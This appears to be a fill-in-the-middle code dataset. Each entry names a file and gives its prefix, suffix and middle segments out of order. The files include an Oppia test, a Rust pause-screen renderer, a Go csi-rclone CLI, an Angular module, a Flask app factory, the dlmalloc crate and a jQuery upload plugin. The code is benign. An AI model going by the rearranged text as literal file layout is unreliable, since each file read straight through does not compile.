task.refreshStatus(this.newTop10AnswerStats(7));
expect(task.isOpen()).toBeTrue();
expect(task.isResolved()).toBeFalse();
});
it('should not change issue description after it is generated', () => {
const task = needsGuidingResponsesTaskObjectFactory.createFromAnswerStats(
'eid', 1, 'Introduction', this.newTop10AnswerStats(0));
expect(task.getIssueDescription()).toBeNull();
task.refreshStatus(this.newTop10AnswerStats(7));
expect(task.getIssueDescription()).toEqual(
'7 of the top 10 answers for this card did not have explicit feedback ' +
'from Oppia.');
task.refreshStatus(this.newTop10AnswerStats(0));
expect(task.getIssueDescription()).toEqual(
'7 of the top 10 answers for this card did not have explicit feedback ' +
'from Oppia.');
task.refreshStatus(this.newTop10AnswerStats(3));
expect(task.getIssueDescription()).toEqual(
'7 of the top 10 answers for this card did not have explicit feedback ' +
'from Oppia.');
});
});
| |
pause_screen.rs
|
use ggez::
{
Context,
GameResult,
graphics::Mesh,
};
pub struct PauseScreen
{
p: Mesh,
a: Mesh,
u: Mesh,
s: Mesh,
e: Mesh,
d: Mesh,
}
impl PauseScreen
{
pub fn new(ctx: &mut Context) -> GameResult<PauseScreen>
|
pub fn draw(&self, ctx: &mut Context, scale: f32, offset: [f32; 2])
-> GameResult
{
use ggez::graphics::
{
DrawParam,
draw,
};
let start = [
(1.0 + (super::BOARD_DIMENSIONS[0] / 2) as f32 - 2.5) * scale,
(1.0 + (super::BOARD_DIMENSIONS[1] / 4) as f32) * scale,
];
draw(ctx, &self.p, DrawParam::default()
.dest([
offset[0] + start[0],
offset[1] + start[1],
])
.scale([scale, scale]))?;
draw(ctx, &self.a, DrawParam::default()
.dest([
offset[0] + start[0] + 1.0 * scale,
offset[1] + start[1],
])
.scale([scale, scale]))?;
draw(ctx, &self.u, DrawParam::default()
.dest([
offset[0] + start[0] + 2.0 * scale,
offset[1] + start[1],
])
.scale([scale, scale]))?;
draw(ctx, &self.s, DrawParam::default()
.dest([
offset[0] + start[0] + 3.0 * scale,
offset[1] + start[1],
])
.scale([scale, scale]))?;
draw(ctx, &self.e, DrawParam::default()
.dest([
offset[0] + start[0] + 4.0 * scale,
offset[1] + start[1],
])
.scale([scale, scale]))?;
draw(ctx, &self.d, DrawParam::default()
.dest([
offset[0] + start[0] + 5.0 * scale,
offset[1] + start[1],
])
.scale([scale, scale]))?;
Ok(())
}
}
|
{
use ggez::graphics::
{
Rect,
DrawMode,
MeshBuilder,
};
let eighth = 1.0 / 8.0;
let p = MeshBuilder::new()
// {
.rectangle(
DrawMode::fill(),
Rect::new(
eighth,
eighth,
eighth * 5.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth,
eighth * 2.0,
eighth * 2.0,
eighth * 5.0),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 5.0,
eighth * 2.0,
eighth * 2.0,
eighth * 2.0),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 3.0,
eighth * 4.0,
eighth * 3.0,
eighth),
(255, 255, 255).into())
.build(ctx)?; // }
let a = MeshBuilder::new()
// {
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 2.0,
eighth,
eighth * 4.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth,
eighth * 2.0,
eighth * 2.0,
eighth * 5.0),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 3.0,
eighth * 4.0,
eighth * 2.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 5.0,
eighth * 2.0,
eighth * 2.0,
eighth * 5.0),
(255, 255, 255).into())
.build(ctx)?; // }
let u = MeshBuilder::new()
// {
.rectangle(
DrawMode::fill(),
Rect::new(
eighth,
eighth,
eighth * 2.0,
eighth * 5.0),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 2.0,
eighth * 6.0,
eighth * 4.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 5.0,
eighth,
eighth * 2.0,
eighth * 5.0),
(255, 255, 255).into())
.build(ctx)?; // }
let s = MeshBuilder::new()
// {
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 2.0,
eighth,
eighth * 5.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth,
eighth * 2.0,
eighth * 2.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 2.0,
eighth * 3.0,
eighth * 4.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 5.0,
eighth * 4.0,
eighth * 2.0,
eighth * 2.0),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth,
eighth * 6.0,
eighth * 5.0,
eighth),
(255, 255, 255).into())
.build(ctx)?; // }
let e = MeshBuilder::new()
// {
.rectangle(
DrawMode::fill(),
Rect::new(
eighth,
eighth,
eighth * 2.0,
eighth * 6.0),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 3.0,
eighth,
eighth * 4.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 3.0,
eighth * 3.0,
eighth * 3.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 3.0,
eighth * 6.0,
eighth * 4.0,
eighth),
(255, 255, 255).into())
.build(ctx)?; // }
let d = MeshBuilder::new()
// {
.rectangle(
DrawMode::fill(),
Rect::new(
eighth,
eighth,
eighth * 2.0,
eighth * 6.0),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 3.0,
eighth,
eighth * 3.0,
eighth),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 5.0,
eighth * 2.0,
eighth * 2.0,
eighth * 4.0),
(255, 255, 255).into())
.rectangle(
DrawMode::fill(),
Rect::new(
eighth * 3.0,
eighth * 6.0,
eighth * 3.0,
eighth),
(255, 255, 255).into())
.build(ctx)?; // }
Ok(PauseScreen
{
p: p,
a: a,
u: u,
s: s,
e: e,
d: d,
})
}
|
main.go
|
package main
import (
"flag"
"fmt"
"os"
"github.com/spf13/cobra"
"github.com/diseq/csi-rclone/pkg/rclone"
)
var (
endpoint string
nodeID string
)
func init()
|
func main() {
flag.CommandLine.Parse([]string{})
cmd := &cobra.Command{
Use: "rclone",
Short: "CSI based rclone driver",
Run: func(cmd *cobra.Command, args []string) {
handle()
},
}
cmd.Flags().AddGoFlagSet(flag.CommandLine)
cmd.PersistentFlags().StringVar(&nodeID, "nodeid", "", "node id")
cmd.MarkPersistentFlagRequired("nodeid")
cmd.PersistentFlags().StringVar(&endpoint, "endpoint", "", "CSI endpoint")
cmd.MarkPersistentFlagRequired("endpoint")
versionCmd := &cobra.Command{
Use: "version",
Short: "Prints information about this version of csi rclone plugin",
Run: func(cmd *cobra.Command, args []string) {
fmt.Printf(`csi-rclone plugin
Version: %s
`, rclone.DriverVersion)
},
}
cmd.AddCommand(versionCmd)
versionCmd.ResetFlags()
cmd.ParseFlags(os.Args[1:])
if err := cmd.Execute(); err != nil {
fmt.Fprintf(os.Stderr, "%s", err.Error())
os.Exit(1)
}
os.Exit(0)
}
func handle() {
d := rclone.NewDriver(nodeID, endpoint)
d.Run()
}
|
{
flag.Set("logtostderr", "true")
}
|
app.module.ts
|
import {BrowserModule} from '@angular/platform-browser';
import {NgModule} from '@angular/core';
import {FormsModule} from '@angular/forms';
import {BrowserAnimationsModule} from '@angular/platform-browser/animations';
import {TranslateModule, TranslateService} from "@ngx-translate/core";
import {JigsawModule} from '@rdkmaster/jigsaw';
import {AppComponent} from './app.component';
@NgModule({
declarations: [
AppComponent
],
imports: [
BrowserModule, FormsModule, BrowserAnimationsModule,
JigsawModule, TranslateModule.forRoot()
],
providers: [TranslateService],
bootstrap: [AppComponent],
entryComponents: []
|
export class AppModule {
constructor(translateService: TranslateService) {
translateService.setTranslation('zh', {
'get-started': '马上开始',
'give-star': '给 Jigsaw 点个星星'
});
translateService.setTranslation('en', {
'get-started': 'Get started',
'give-star': 'Give us a star on Github.com'
});
const lang: string = translateService.getBrowserLang();
translateService.setDefaultLang(lang);
translateService.use(lang);
}
}
|
})
|
__init__.py
|
import os
import resources_portal.models # noqa
from flask import Flask
from flask_migrate import Migrate
from flask_restful import Api
from resources_portal.db import db
from resources_portal.views import user
migrate = Migrate()
def initialize_routes(api: Api):
|
def set_database_URI(app: Flask):
database_URI_template = "postgresql://{DB_USER}:{DB_PASSWORD}@{DB_HOST}:{DB_PORT}/{DB_NAME}"
app.config["SQLALCHEMY_DATABASE_URI"] = database_URI_template.format(
DB_USER=app.config["DB_USER"],
DB_PASSWORD=app.config["DB_PASSWORD"],
DB_HOST=os.environ["DB_HOST"],
DB_PORT=app.config["DB_PORT"],
DB_NAME=app.config["DB_NAME"],
)
def create_app(test_config=None):
# create and configure the app
app = Flask(__name__)
app.config.from_envvar("RESOURCES_PORTAL_CONFIG_FILE")
set_database_URI(app)
api = Api(app)
initialize_routes(api)
# ensure the instance folder exists
try:
os.makedirs(app.instance_path)
except OSError:
pass
db.init_app(app)
migrate.init_app(app, db)
from resources_portal.schemas import ma
ma.init_app(app)
return app
|
api.add_resource(user.UsersApi, "/users")
api.add_resource(user.UserApi, "/users/<user_id>")
|
lib.rs
|
//! A Rust port of the `dlmalloc` allocator.
//!
//! The `dlmalloc` allocator is described at
//! http://g.oswego.edu/dl/html/malloc.html and this Rust crate is a straight
//! port of the C code for the allocator into Rust. The implementation is
//! wrapped up in a `Dlmalloc` type and has support for Linux, OSX, and Wasm
//! currently.
//!
//! The primary purpose of this crate is that it serves as the default memory
//! allocator for the `wasm32-unknown-unknown` target in the standard library.
//! Support for other platforms is largely untested and unused, but is used when
//! testing this crate.
#![cfg_attr(feature = "allocator-api", feature(allocator_api))]
#![cfg_attr(target_env = "sgx", feature(asm))]
|
#[cfg(feature = "allocator-api")]
use core::alloc::{Alloc, AllocErr, Layout};
use core::cmp;
use core::ptr;
#[cfg(all(feature = "global", not(test)))]
pub use self::global::GlobalDlmalloc;
mod dlmalloc;
#[cfg(all(feature = "global", not(test)))]
mod global;
/// An allocator instance
///
/// Instances of this type are used to allocate blocks of memory. For best
/// results only use one of these. Currently doesn't implement `Drop` to release
/// lingering memory back to the OS. That may happen eventually though!
pub struct Dlmalloc(dlmalloc::Dlmalloc);
/// Constant initializer for `Dlmalloc` structure.
pub const DLMALLOC_INIT: Dlmalloc = Dlmalloc(dlmalloc::DLMALLOC_INIT);
#[cfg(target_os = "xous")]
#[path = "xous.rs"]
mod sys;
#[cfg(target_arch = "wasm32")]
#[path = "wasm.rs"]
mod sys;
#[cfg(target_os = "macos")]
#[path = "macos.rs"]
mod sys;
#[cfg(target_os = "linux")]
#[path = "linux.rs"]
mod sys;
#[cfg(target_env = "sgx")]
#[path = "sgx.rs"]
mod sys;
impl Dlmalloc {
/// Creates a new instance of an allocator, same as `DLMALLOC_INIT`.
pub fn new() -> Dlmalloc {
DLMALLOC_INIT
}
/// Allocates `size` bytes with `align` align.
///
/// Returns a null pointer if allocation fails. Returns a valid pointer
/// otherwise.
///
/// Safety and contracts are largely governed by the `GlobalAlloc::alloc`
/// method contracts.
#[inline]
pub unsafe fn malloc(&mut self, size: usize, align: usize) -> *mut u8 {
if align <= self.0.malloc_alignment() {
self.0.malloc(size)
} else {
self.0.memalign(align, size)
}
}
/// Same as `malloc`, except if the allocation succeeds it's guaranteed to
/// point to `size` bytes of zeros.
#[inline]
pub unsafe fn calloc(&mut self, size: usize, align: usize) -> *mut u8 {
let ptr = self.malloc(size, align);
if !ptr.is_null() && self.0.calloc_must_clear(ptr) {
ptr::write_bytes(ptr, 0, size);
}
ptr
}
/// Deallocates a `ptr` with `size` and `align` as the previous request used
/// to allocate it.
///
/// Safety and contracts are largely governed by the `GlobalAlloc::dealloc`
/// method contracts.
#[inline]
pub unsafe fn free(&mut self, ptr: *mut u8, size: usize, align: usize) {
drop((size, align));
self.0.free(ptr)
}
/// Reallocates `ptr`, a previous allocation with `old_size` and
/// `old_align`, to have `new_size` and the same alignment as before.
///
/// Returns a null pointer if the memory couldn't be reallocated, but `ptr`
/// is still valid. Returns a valid pointer and frees `ptr` if the request
/// is satisfied.
///
/// Safety and contracts are largely governed by the `GlobalAlloc::realloc`
/// method contracts.
#[inline]
pub unsafe fn realloc(
&mut self,
ptr: *mut u8,
old_size: usize,
old_align: usize,
new_size: usize,
) -> *mut u8 {
if old_align <= self.0.malloc_alignment() {
self.0.realloc(ptr, new_size)
} else {
let res = self.malloc(new_size, old_align);
if !res.is_null() {
let size = cmp::min(old_size, new_size);
ptr::copy_nonoverlapping(ptr, res, size);
self.free(ptr, old_size, old_align);
}
res
}
}
}
#[cfg(feature = "allocator-api")]
unsafe impl Alloc for Dlmalloc {
#[inline]
unsafe fn alloc(&mut self, layout: Layout) -> Result<ptr::NonNull<u8>, AllocErr> {
let ptr = <Dlmalloc>::malloc(self, layout.size(), layout.align());
ptr::NonNull::new(ptr).ok_or(AllocErr)
}
#[inline]
unsafe fn dealloc(&mut self, ptr: ptr::NonNull<u8>, layout: Layout) {
<Dlmalloc>::free(self, ptr.as_ptr(), layout.size(), layout.align())
}
#[inline]
unsafe fn realloc(
&mut self,
ptr: ptr::NonNull<u8>,
layout: Layout,
new_size: usize,
) -> Result<ptr::NonNull<u8>, AllocErr> {
let ptr = <Dlmalloc>::realloc(self, ptr.as_ptr(), layout.size(), layout.align(), new_size);
ptr::NonNull::new(ptr).ok_or(AllocErr)
}
#[inline]
unsafe fn alloc_zeroed(&mut self, layout: Layout) -> Result<ptr::NonNull<u8>, AllocErr> {
let ptr = <Dlmalloc>::calloc(self, layout.size(), layout.align());
ptr::NonNull::new(ptr).ok_or(AllocErr)
}
}
|
#![cfg_attr(not(feature = "allocator-api"), allow(dead_code))]
#![no_std]
#![deny(missing_docs)]
|
jquery.fileupload-ui.js
|
/*
* jQuery File Upload User Interface Plugin
* https://github.com/blueimp/jQuery-File-Upload
*
* Copyright 2010, Sebastian Tschan
* https://blueimp.net
*
* Licensed under the MIT license:
* https://opensource.org/licenses/MIT
*/
/* global define, require */
(function (factory) {
'use strict';
if (typeof define === 'function' && define.amd) {
// Register as an anonymous AMD module:
define([
'jquery',
'blueimp-tmpl',
'./jquery.fileupload-image',
'./jquery.fileupload-audio',
'./jquery.fileupload-video',
'./jquery.fileupload-validate'
], factory);
} else if (typeof exports === 'object') {
// Node/CommonJS:
factory(
require('jquery'),
require('blueimp-tmpl'),
require('./jquery.fileupload-image'),
require('./jquery.fileupload-audio'),
require('./jquery.fileupload-video'),
require('./jquery.fileupload-validate')
);
} else {
// Browser globals:
factory(window.jQuery, window.tmpl);
}
})(function ($, tmpl) {
'use strict';
$.blueimp.yafFileUpload.prototype._specialOptions.push(
'filesContainer',
'uploadTemplateId',
'downloadTemplateId'
);
// The UI version extends the file upload widget
// and adds complete user interface interaction:
$.widget('blueimp.yafFileUpload', $.blueimp.yafFileUpload, {
options: {
// By default, files added to the widget are uploaded as soon
// as the user clicks on the start buttons. To enable automatic
// uploads, set the following option to true:
autoUpload: false,
// The class to show/hide UI elements:
showElementClass: 'in',
// The ID of the upload template:
uploadTemplateId: 'template-upload',
// The ID of the download template:
downloadTemplateId: 'template-download',
// The container for the list of files. If undefined, it is set to
// an element with class "files" inside of the widget element:
filesContainer: undefined,
// By default, files are appended to the files container.
// Set the following option to true, to prepend files instead:
prependFiles: false,
// The expected data type of the upload response, sets the dataType
// option of the $.ajax upload requests:
dataType: 'json',
// Error and info messages:
messages: {
unknownError: 'Unknown error'
},
// Function returning the current number of files,
// used by the maxNumberOfFiles validation:
getNumberOfFiles: function () {
return this.filesContainer.children().not('.processing').length;
},
// Callback to retrieve the list of files from the server response:
getFilesFromResponse: function (data) {
if (data.result && $.isArray(data.result.files)) {
return data.result.files;
}
return [];
},
// The add callback is invoked as soon as files are added to the fileupload
// widget (via file input selection, drag & drop or add API call).
// See the basic file upload widget for more information:
add: function (e, data) {
if (e.isDefaultPrevented()) {
return false;
}
var $this = $(this),
that = $this.data('blueimp-yafFileUpload') || $this.data('fileupload'),
options = that.options;
data.context = that
._renderUpload(data.files)
.data('data', data)
.addClass('processing');
options.filesContainer[options.prependFiles ? 'prepend' : 'append'](
data.context
);
that._forceReflow(data.context);
that._transition(data.context);
data
.process(function () {
return $this.yafFileUpload('process', data);
})
.always(function () {
data.context
.each(function (index) {
$(this)
.find('.size')
.text(that._formatFileSize(data.files[index].size));
})
.removeClass('processing');
that._renderPreviews(data);
})
.done(function () {
data.context.find('.edit,.start').prop('disabled', false);
if (
that._trigger('added', e, data) !== false &&
(options.autoUpload || data.autoUpload) &&
data.autoUpload !== false
) {
data.submit();
}
})
.fail(function () {
if (data.files.error) {
data.context.each(function (index) {
var error = data.files[index].error;
if (error) {
$(this).find('.error').text(error);
}
});
}
});
},
// Callback for the start of each file upload request:
send: function (e, data) {
if (e.isDefaultPrevented()) {
return false;
}
var that =
$(this).data('blueimp-yafFileUpload') || $(this).data('fileupload');
if (
data.context &&
data.dataType &&
data.dataType.substr(0, 6) === 'iframe'
) {
// Iframe Transport does not support progress events.
// In lack of an indeterminate progress bar, we set
// the progress to 100%, showing the full animated bar:
data.context
.find('.progress')
.addClass(!$.support.transition && 'progress-animated')
.attr('aria-valuenow', 100)
.children()
.first()
.css('width', '100%');
}
return that._trigger('sent', e, data);
},
// Callback for successful uploads:
done: function (e, data) {
if (e.isDefaultPrevented()) {
return false;
}
var that =
$(this).data('blueimp-yafFileUpload') || $(this).data('fileupload'),
getFilesFromResponse =
data.getFilesFromResponse || that.options.getFilesFromResponse,
files = getFilesFromResponse(data),
template,
deferred;
if (data.context) {
data.context.each(function (index) {
var file = files[index] || { error: 'Empty file upload result' };
deferred = that._addFinishedDeferreds();
that._transition($(this)).done(function () {
var node = $(this);
template = that._renderDownload([file]).replaceAll(node);
that._forceReflow(template);
that._transition(template).done(function () {
data.context = $(this);
that._trigger('completed', e, data);
that._trigger('finished', e, data);
deferred.resolve();
});
});
});
} else {
template = that
._renderDownload(files)
[that.options.prependFiles ? 'prependTo' : 'appendTo'](
that.options.filesContainer
);
that._forceReflow(template);
deferred = that._addFinishedDeferreds();
that._transition(template).done(function () {
data.context = $(this);
that._trigger('completed', e, data);
that._trigger('finished', e, data);
deferred.resolve();
});
}
},
// Callback for failed (abort or error) uploads:
fail: function (e, data) {
if (e.isDefaultPrevented()) {
return false;
}
var that =
$(this).data('blueimp-yafFileUpload') || $(this).data('fileupload'),
template,
deferred;
if (data.context) {
data.context.each(function (index) {
if (data.errorThrown !== 'abort') {
var file = data.files[index];
file.error =
file.error || data.errorThrown || data.i18n('unknownError');
deferred = that._addFinishedDeferreds();
that._transition($(this)).done(function () {
var node = $(this);
template = that._renderDownload([file]).replaceAll(node);
that._forceReflow(template);
that._transition(template).done(function () {
data.context = $(this);
that._trigger('failed', e, data);
that._trigger('finished', e, data);
deferred.resolve();
});
});
} else {
deferred = that._addFinishedDeferreds();
that._transition($(this)).done(function () {
$(this).remove();
that._trigger('failed', e, data);
that._trigger('finished', e, data);
deferred.resolve();
});
}
});
} else if (data.errorThrown !== 'abort') {
data.context = that
._renderUpload(data.files)
[that.options.prependFiles ? 'prependTo' : 'appendTo'](
that.options.filesContainer
)
.data('data', data);
that._forceReflow(data.context);
deferred = that._addFinishedDeferreds();
that._transition(data.context).done(function () {
data.context = $(this);
that._trigger('failed', e, data);
that._trigger('finished', e, data);
deferred.resolve();
});
} else {
that._trigger('failed', e, data);
that._trigger('finished', e, data);
that._addFinishedDeferreds().resolve();
}
},
// Callback for upload progress events:
progress: function (e, data) {
if (e.isDefaultPrevented()) {
return false;
}
var progress = Math.floor((data.loaded / data.total) * 100);
if (data.context) {
data.context.each(function () {
$(this)
.find('.progress')
|
.first()
.css('width', progress + '%');
});
}
},
// Callback for global upload progress events:
progressall: function (e, data) {
if (e.isDefaultPrevented()) {
return false;
}
var $this = $(this),
progress = Math.floor((data.loaded / data.total) * 100),
globalProgressNode = $this.find('.fileupload-progress'),
extendedProgressNode = globalProgressNode.find('.progress-extended');
if (extendedProgressNode.length) {
extendedProgressNode.html(
(
$this.data('blueimp-yafFileUpload') || $this.data('fileupload')
)._renderExtendedProgress(data)
);
}
globalProgressNode
.find('.progress')
.attr('aria-valuenow', progress)
.children()
.first()
.css('width', progress + '%');
},
// Callback for uploads start, equivalent to the global ajaxStart event:
start: function (e) {
if (e.isDefaultPrevented()) {
return false;
}
var that =
$(this).data('blueimp-yafFileUpload') || $(this).data('fileupload');
that._resetFinishedDeferreds();
that
._transition($(this).find('.fileupload-progress'))
.done(function () {
that._trigger('started', e);
});
},
// Callback for uploads stop, equivalent to the global ajaxStop event:
stop: function (e) {
if (e.isDefaultPrevented()) {
return false;
}
var that =
$(this).data('blueimp-yafFileUpload') || $(this).data('fileupload'),
deferred = that._addFinishedDeferreds();
$.when.apply($, that._getFinishedDeferreds()).done(function () {
that._trigger('stopped', e);
});
that
._transition($(this).find('.fileupload-progress'))
.done(function () {
$(this)
.find('.progress')
.attr('aria-valuenow', '0')
.children()
.first()
.css('width', '0%');
$(this).find('.progress-extended').html(' ');
deferred.resolve();
});
},
processstart: function (e) {
if (e.isDefaultPrevented()) {
return false;
}
$(this).addClass('fileupload-processing');
},
processstop: function (e) {
if (e.isDefaultPrevented()) {
return false;
}
$(this).removeClass('fileupload-processing');
},
// Callback for file deletion:
destroy: function (e, data) {
if (e.isDefaultPrevented()) {
return false;
}
var that =
$(this).data('blueimp-yafFileUpload') || $(this).data('fileupload'),
removeNode = function () {
that._transition(data.context).done(function () {
$(this).remove();
that._trigger('destroyed', e, data);
});
};
if (data.url) {
data.dataType = data.dataType || that.options.dataType;
$.ajax(data)
.done(removeNode)
.fail(function () {
that._trigger('destroyfailed', e, data);
});
} else {
removeNode();
}
}
},
_resetFinishedDeferreds: function () {
this._finishedUploads = [];
},
_addFinishedDeferreds: function (deferred) {
// eslint-disable-next-line new-cap
var promise = deferred || $.Deferred();
this._finishedUploads.push(promise);
return promise;
},
_getFinishedDeferreds: function () {
return this._finishedUploads;
},
// Link handler, that allows to download files
// by drag & drop of the links to the desktop:
_enableDragToDesktop: function () {
var link = $(this),
url = link.prop('href'),
name = link.prop('download'),
type = 'application/octet-stream';
link.on('dragstart', function (e) {
try {
e.originalEvent.dataTransfer.setData(
'DownloadURL',
[type, name, url].join(':')
);
} catch (ignore) {
// Ignore exceptions
}
});
},
_formatFileSize: function (bytes) {
if (typeof bytes !== 'number') {
return '';
}
if (bytes >= 1000000000) {
return (bytes / 1000000000).toFixed(2) + ' GB';
}
if (bytes >= 1000000) {
return (bytes / 1000000).toFixed(2) + ' MB';
}
return (bytes / 1000).toFixed(2) + ' KB';
},
_formatBitrate: function (bits) {
if (typeof bits !== 'number') {
return '';
}
if (bits >= 1000000000) {
return (bits / 1000000000).toFixed(2) + ' Gbit/s';
}
if (bits >= 1000000) {
return (bits / 1000000).toFixed(2) + ' Mbit/s';
}
if (bits >= 1000) {
return (bits / 1000).toFixed(2) + ' kbit/s';
}
return bits.toFixed(2) + ' bit/s';
},
_formatTime: function (seconds) {
var date = new Date(seconds * 1000),
days = Math.floor(seconds / 86400);
days = days ? days + 'd ' : '';
return (
days +
('0' + date.getUTCHours()).slice(-2) +
':' +
('0' + date.getUTCMinutes()).slice(-2) +
':' +
('0' + date.getUTCSeconds()).slice(-2)
);
},
_formatPercentage: function (floatValue) {
return (floatValue * 100).toFixed(2) + ' %';
},
_renderExtendedProgress: function (data) {
return (
this._formatBitrate(data.bitrate) +
' | ' +
this._formatTime(((data.total - data.loaded) * 8) / data.bitrate) +
' | ' +
this._formatPercentage(data.loaded / data.total) +
' | ' +
this._formatFileSize(data.loaded) +
' / ' +
this._formatFileSize(data.total)
);
},
_renderTemplate: function (func, files) {
if (!func) {
return $();
}
var result = func({
files: files,
formatFileSize: this._formatFileSize,
options: this.options
});
if (result instanceof $) {
return result;
}
return $(this.options.templatesContainer).html(result).children();
},
_renderPreviews: function (data) {
data.context.find('.preview').each(function (index, elm) {
$(elm).empty().append(data.files[index].preview);
});
},
_renderUpload: function (files) {
return this._renderTemplate(this.options.uploadTemplate, files);
},
_renderDownload: function (files) {
return this._renderTemplate(this.options.downloadTemplate, files)
.find('a[download]')
.each(this._enableDragToDesktop)
.end();
},
_editHandler: function (e) {
e.preventDefault();
if (!this.options.edit) return;
var that = this,
button = $(e.currentTarget),
template = button.closest('.template-upload'),
data = template.data('data'),
index = button.data().index;
this.options.edit(data.files[index]).then(function (file) {
if (!file) return;
data.files[index] = file;
data.context.addClass('processing');
template.find('.edit,.start').prop('disabled', true);
$(that.element)
.yafFileUpload('process', data)
.always(function () {
template
.find('.size')
.text(that._formatFileSize(data.files[index].size));
data.context.removeClass('processing');
that._renderPreviews(data);
})
.done(function () {
template.find('.edit,.start').prop('disabled', false);
})
.fail(function () {
template.find('.edit').prop('disabled', false);
var error = data.files[index].error;
if (error) {
template.find('.error').text(error);
}
});
});
},
_startHandler: function (e) {
e.preventDefault();
var button = $(e.currentTarget),
template = button.closest('.template-upload'),
data = template.data('data');
button.prop('disabled', true);
if (data && data.submit) {
data.submit();
}
},
_cancelHandler: function (e) {
e.preventDefault();
var template = $(e.currentTarget).closest(
'.template-upload,.template-download'
),
data = template.data('data') || {};
data.context = data.context || template;
if (data.abort) {
data.abort();
} else {
data.errorThrown = 'abort';
this._trigger('fail', e, data);
}
},
_deleteHandler: function (e) {
e.preventDefault();
var button = $(e.currentTarget);
this._trigger(
'destroy',
e,
$.extend(
{
context: button.closest('.template-download'),
type: 'DELETE'
},
button.data()
)
);
},
_forceReflow: function (node) {
return $.support.transition && node.length && node[0].offsetWidth;
},
_transition: function (node) {
// eslint-disable-next-line new-cap
var dfd = $.Deferred();
if (
$.support.transition &&
node.hasClass('fade') &&
node.is(':visible')
) {
var transitionEndHandler = function (e) {
// Make sure we don't respond to other transition events
// in the container element, e.g. from button elements:
if (e.target === node[0]) {
node.off($.support.transition.end, transitionEndHandler);
dfd.resolveWith(node);
}
};
node
.on($.support.transition.end, transitionEndHandler)
.toggleClass(this.options.showElementClass);
} else {
node.toggleClass(this.options.showElementClass);
dfd.resolveWith(node);
}
return dfd;
},
_initButtonBarEventHandlers: function () {
var fileUploadButtonBar = this.element.find('.fileupload-buttonbar'),
filesList = this.options.filesContainer;
this._on(fileUploadButtonBar.find('.start'), {
click: function (e) {
e.preventDefault();
filesList.find('.start').click();
}
});
this._on(fileUploadButtonBar.find('.cancel'), {
click: function (e) {
e.preventDefault();
filesList.find('.cancel').click();
}
});
this._on(fileUploadButtonBar.find('.delete'), {
click: function (e) {
e.preventDefault();
filesList
.find('.toggle:checked')
.closest('.template-download')
.find('.delete')
.click();
fileUploadButtonBar.find('.toggle').prop('checked', false);
}
});
this._on(fileUploadButtonBar.find('.toggle'), {
change: function (e) {
filesList
.find('.toggle')
.prop('checked', $(e.currentTarget).is(':checked'));
}
});
},
_destroyButtonBarEventHandlers: function () {
this._off(
this.element
.find('.fileupload-buttonbar')
.find('.start, .cancel, .delete'),
'click'
);
this._off(this.element.find('.fileupload-buttonbar .toggle'), 'change.');
},
_initEventHandlers: function () {
this._super();
this._on(this.options.filesContainer, {
'click .edit': this._editHandler,
'click .start': this._startHandler,
'click .cancel': this._cancelHandler,
'click .delete': this._deleteHandler
});
this._initButtonBarEventHandlers();
},
_destroyEventHandlers: function () {
this._destroyButtonBarEventHandlers();
this._off(this.options.filesContainer, 'click');
this._super();
},
_enableFileInputButton: function () {
this.element
.find('.fileinput-button input')
.prop('disabled', false)
.parent()
.removeClass('disabled');
},
_disableFileInputButton: function () {
this.element
.find('.fileinput-button input')
.prop('disabled', true)
.parent()
.addClass('disabled');
},
_initTemplates: function () {
var options = this.options;
options.templatesContainer = this.document[0].createElement(
options.filesContainer.prop('nodeName')
);
if (tmpl) {
if (options.uploadTemplateId) {
options.uploadTemplate = tmpl(options.uploadTemplateId);
}
if (options.downloadTemplateId) {
options.downloadTemplate = tmpl(options.downloadTemplateId);
}
}
},
_initFilesContainer: function () {
var options = this.options;
if (options.filesContainer === undefined) {
options.filesContainer = this.element.find('.files');
} else if (!(options.filesContainer instanceof $)) {
options.filesContainer = $(options.filesContainer);
}
},
_initSpecialOptions: function () {
this._super();
this._initFilesContainer();
this._initTemplates();
},
_create: function () {
this._super();
this._resetFinishedDeferreds();
if (!$.support.fileInput) {
this._disableFileInputButton();
}
},
enable: function () {
var wasDisabled = false;
if (this.options.disabled) {
wasDisabled = true;
}
this._super();
if (wasDisabled) {
this.element.find('input, button').prop('disabled', false);
this._enableFileInputButton();
}
},
disable: function () {
if (!this.options.disabled) {
this.element.find('input, button').prop('disabled', true);
this._disableFileInputButton();
}
this._super();
}
});
});
|
.attr('aria-valuenow', progress)
.children()
|
kanaToRomaji_test.go
|
package kanaconv
import (
"testing"
"github.com/stretchr/testify/assert"
)
type inp struct {
input string
want string
}
func TestBasic(t *testing.T) {
const want = "aiueon"
for _, v := range [2]string{"あいうえおん", "アイウエオン"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestBasicDakuten(t *testing.T) {
const want = "vu"
for _, v := range [2]string{"ゔ", "ヴ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestK(t *testing.T) {
const want = "kakikukeko"
for _, v := range [2]string{"かきくけこ", "カキクケコ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
